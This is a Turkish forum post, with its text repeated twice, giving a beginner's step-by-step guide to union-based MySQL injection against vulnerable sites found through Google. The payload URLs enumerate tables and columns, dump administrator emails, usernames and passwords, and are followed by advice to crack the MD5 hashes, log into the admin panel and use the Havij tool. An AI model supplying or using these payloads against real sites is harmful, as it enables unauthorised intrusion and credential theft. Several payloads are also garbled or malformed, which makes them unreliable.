Sql anlayamayanlar için geniş anlatım
--------------------------------------------------------------------------------
Merhaba Bu Konuyu Yeni Başlayanlar İçin açmak istiyorum
çoğu yerlerde ayrıntılı olarak anlatılmıyor ve arkadaşların aklında takılı yerler kalıyor kalmaması için bu konuyu açıyorum.
Googlede arama yaptınız ve mysql injection yiyen bi site buldunuz hemen başlayalım
ozaman.
hatayı bulduktan sonra ha birde bağzı siteler a ile hata vermiyor peki bunun için ne yapıcağız derseniz
+and+1=0 ekleyerek hatamızı alabiliriz. daha bir çok hata kodları var arama yapabilirsiniz
Şimdi Anlatıma Geçmek İstiyorum
1. Adım Hata Almak
örneksite.com/index.php?id=1a yaptık ve hatamız ekrana geldi
sonra
2. adım olarak column bulma
bu defada örneksite.com/index.php?id=1+order+by+30-- yazarak kolun numaralarını almaya çalışıyoruz Evet 30 yazdık ve unknow 30 diye hata veriyorsa column sayımız 30 dan küçüktür demek
ozamn 30 sayısını tek tek geri doğru düşürüyoruz.Hata vermeyen bir ekran gelene kadar
ve sonunda 15 e geldik ve hata vermedi
örnek
örneksite.com/index.php?id=1+order+by+15-- dedik ve hata vermedi ise column sayımız 15 demektir.
sıra geldik bilgileri çekecek column numaralarını bulmaya
bunun içinde
örneksite.com/index.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14,15--
dedik ve ekrana column numaraları yansını
örnek
3 5 diye bu demektir ki. Bilgileri 3 ve 5 numaralı columnlardan çekeceğiz
bunun içinde
örneksite.com/index.php?id=1+union+select+1,2,version(),4,5,6,7, 8,9,10,11,12,13,14,15--
yazdık ve 3. column a version() koyarız Ve versionuda bulduk version 5.x miş
ama 4.x çıkarsa bilgiler çekilmez
sırada tablo isimlerini bulmak var.Budefa da version() yazdığımız yere group_concat(table_name) yazalım ve sitenin sonunada +from+information_schema.tables-- ekleriz
örnek
örneksite.com/index.php?id=1+union+select+1,2,group_concat(table _name),4,5,6,7,8,9,10,11,12,13,14,15+from+informat ion_schema.tables--
Yaptığımızda Tablo isimleri yansıdı ama bize gerekli olan yerler admin , yönetici,siteayar,user,users, members, gibi üye yada admin yerleri ama baı sitelerde gerçek tablo isimleri yansımaz bunun için ise
+from+information_schema.tables+where+table_schema =database()-- ekleriz
örnek
örneksite.com/index.php?id=1+union+select+1,2,group_concat(table _name),4,5,6,7,8,9,10,11,12,13,14,15
+from+information_schema.tables+where+table_schema =database()-- yazarız ve tüm tablo isimlerimizi görterir
örnek
admin,arab07applogin,
arab07flash,arab07gallery,
arab07headline_news,arab07lastnews,
arab07login,arab07news,arab07newsletter,arab07numb er,
arab07participate,arabdemoengallery,arabdemoenhead line_news,
arabdemoenlastnews,arabdemoenlastnews_first,arabde moenlogin,
arabdemoennews,arabdemoennewsletter,arabdemogaller y,
arabdemoheadline_news,arabde gibi
şimdi ide işe koyulalım bize burdan admin işe yarar
örneksite.com/index.php?id=1+union+select+1,2,group_concat(colum n_name),4,5,6,7,8,9,10,11,12,13,14,15+from+informa tion_schema.columns+where+table_name=0x61646d696e
yaparak admin column unun içindeki bilgileri çekeriz ama 0x61646d696e bu sayılar ne diye soracak olursanız admin-- yazısının hex lenmiş halidir
bağzı sistemlerde group_concata izin vermez onun içinde
limit kullanırız bunu hem table hemde coloum kullanımı için yapa biliriz table bulalım
örneksite.com/index.php?id=1+union+select+1,2,table _name,4,5,6,7,8,9,10,11,12,13,14,15+from+informati on_schema.tables+where+limit 1=1
yaptığımızda columnlar yansır ve 1=1 2=1 3=1 4=1 tıye tek tek arttırdığımızda değişik columnlar çıkar
şimdi tablemiz admin column larımızda email,kullaniciadi,sifre
olsun bunları siteye nasıl uygulayacaz bakalım
örneksite.com/index.php?id=1+union+select+group_concat(email,0x3 a,kullaniciadi,0x3a,sifre),2,3,4,5,6,7,8,9,10,11,1 2+fr om+admin--
Yaptığımızda Admin Yetkisine sahim kullanıcı bilgileri çıkacaktır
0x3a bunlar ne diye soracak olursanız : iki nokta üst üst ednin hex lenmiş halidir
ve ekrana yansıdı sırasıyla önce email yazdık ve en başta email çıkar sonra kullanıcı adı ve en sonada şifre olarak yansır tabi siz bunlrın yerlerini değiştire bilirsiniz
eğer şifremiz md5 olarak çıkmış ise md5 i kırarsınız ve admin panelini bulup içeri dala bilirsiniz
ama hiç bunlarla uğraşmayıp havij programınıda indire bilirsiniz kullanımı çok basittir
admin paneli bulma ve md 5 kırma programıdır aynı zamandada.Haviji konu sonuna paylaştım:
Free File Hosting, Online Storage & File Upload with FileServe
Yardımcı olduysa ne mutlu.
--------------------------------------------------------------------------------
Merhaba Bu Konuyu Yeni Başlayanlar İçin açmak istiyorum
çoğu yerlerde ayrıntılı olarak anlatılmıyor ve arkadaşların aklında takılı yerler kalıyor kalmaması için bu konuyu açıyorum.
Googlede arama yaptınız ve mysql injection yiyen bi site buldunuz hemen başlayalım
ozaman.
hatayı bulduktan sonra ha birde bağzı siteler a ile hata vermiyor peki bunun için ne yapıcağız derseniz
+and+1=0 ekleyerek hatamızı alabiliriz. daha bir çok hata kodları var arama yapabilirsiniz
Şimdi Anlatıma Geçmek İstiyorum
1. Adım Hata Almak
örneksite.com/index.php?id=1a yaptık ve hatamız ekrana geldi
sonra
2. adım olarak column bulma
bu defada örneksite.com/index.php?id=1+order+by+30-- yazarak kolun numaralarını almaya çalışıyoruz Evet 30 yazdık ve unknow 30 diye hata veriyorsa column sayımız 30 dan küçüktür demek
ozamn 30 sayısını tek tek geri doğru düşürüyoruz.Hata vermeyen bir ekran gelene kadar
ve sonunda 15 e geldik ve hata vermedi
örnek
örneksite.com/index.php?id=1+order+by+15-- dedik ve hata vermedi ise column sayımız 15 demektir.
sıra geldik bilgileri çekecek column numaralarını bulmaya
bunun içinde
örneksite.com/index.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14,15--
dedik ve ekrana column numaraları yansını
örnek
3 5 diye bu demektir ki. Bilgileri 3 ve 5 numaralı columnlardan çekeceğiz
bunun içinde
örneksite.com/index.php?id=1+union+select+1,2,version(),4,5,6,7, 8,9,10,11,12,13,14,15--
yazdık ve 3. column a version() koyarız Ve versionuda bulduk version 5.x miş
ama 4.x çıkarsa bilgiler çekilmez
sırada tablo isimlerini bulmak var.Budefa da version() yazdığımız yere group_concat(table_name) yazalım ve sitenin sonunada +from+information_schema.tables-- ekleriz
örnek
örneksite.com/index.php?id=1+union+select+1,2,group_concat(table _name),4,5,6,7,8,9,10,11,12,13,14,15+from+informat ion_schema.tables--
Yaptığımızda Tablo isimleri yansıdı ama bize gerekli olan yerler admin , yönetici,siteayar,user,users, members, gibi üye yada admin yerleri ama baı sitelerde gerçek tablo isimleri yansımaz bunun için ise
+from+information_schema.tables+where+table_schema =database()-- ekleriz
örnek
örneksite.com/index.php?id=1+union+select+1,2,group_concat(table _name),4,5,6,7,8,9,10,11,12,13,14,15
+from+information_schema.tables+where+table_schema =database()-- yazarız ve tüm tablo isimlerimizi görterir
örnek
admin,arab07applogin,
arab07flash,arab07gallery,
arab07headline_news,arab07lastnews,
arab07login,arab07news,arab07newsletter,arab07numb er,
arab07participate,arabdemoengallery,arabdemoenhead line_news,
arabdemoenlastnews,arabdemoenlastnews_first,arabde moenlogin,
arabdemoennews,arabdemoennewsletter,arabdemogaller y,
arabdemoheadline_news,arabde gibi
şimdi ide işe koyulalım bize burdan admin işe yarar
örneksite.com/index.php?id=1+union+select+1,2,group_concat(colum n_name),4,5,6,7,8,9,10,11,12,13,14,15+from+informa tion_schema.columns+where+table_name=0x61646d696e
yaparak admin column unun içindeki bilgileri çekeriz ama 0x61646d696e bu sayılar ne diye soracak olursanız admin-- yazısının hex lenmiş halidir
bağzı sistemlerde group_concata izin vermez onun içinde
limit kullanırız bunu hem table hemde coloum kullanımı için yapa biliriz table bulalım
örneksite.com/index.php?id=1+union+select+1,2,table _name,4,5,6,7,8,9,10,11,12,13,14,15+from+informati on_schema.tables+where+limit 1=1
yaptığımızda columnlar yansır ve 1=1 2=1 3=1 4=1 tıye tek tek arttırdığımızda değişik columnlar çıkar
şimdi tablemiz admin column larımızda email,kullaniciadi,sifre
olsun bunları siteye nasıl uygulayacaz bakalım
örneksite.com/index.php?id=1+union+select+group_concat(email,0x3 a,kullaniciadi,0x3a,sifre),2,3,4,5,6,7,8,9,10,11,1 2+fr om+admin--
Yaptığımızda Admin Yetkisine sahim kullanıcı bilgileri çıkacaktır
0x3a bunlar ne diye soracak olursanız : iki nokta üst üst ednin hex lenmiş halidir
ve ekrana yansıdı sırasıyla önce email yazdık ve en başta email çıkar sonra kullanıcı adı ve en sonada şifre olarak yansır tabi siz bunlrın yerlerini değiştire bilirsiniz
eğer şifremiz md5 olarak çıkmış ise md5 i kırarsınız ve admin panelini bulup içeri dala bilirsiniz
ama hiç bunlarla uğraşmayıp havij programınıda indire bilirsiniz kullanımı çok basittir
admin paneli bulma ve md 5 kırma programıdır aynı zamandada.Haviji konu sonuna paylaştım:
Free File Hosting, Online Storage & File Upload with FileServe
Yardımcı olduysa ne mutlu.
Son düzenleme:
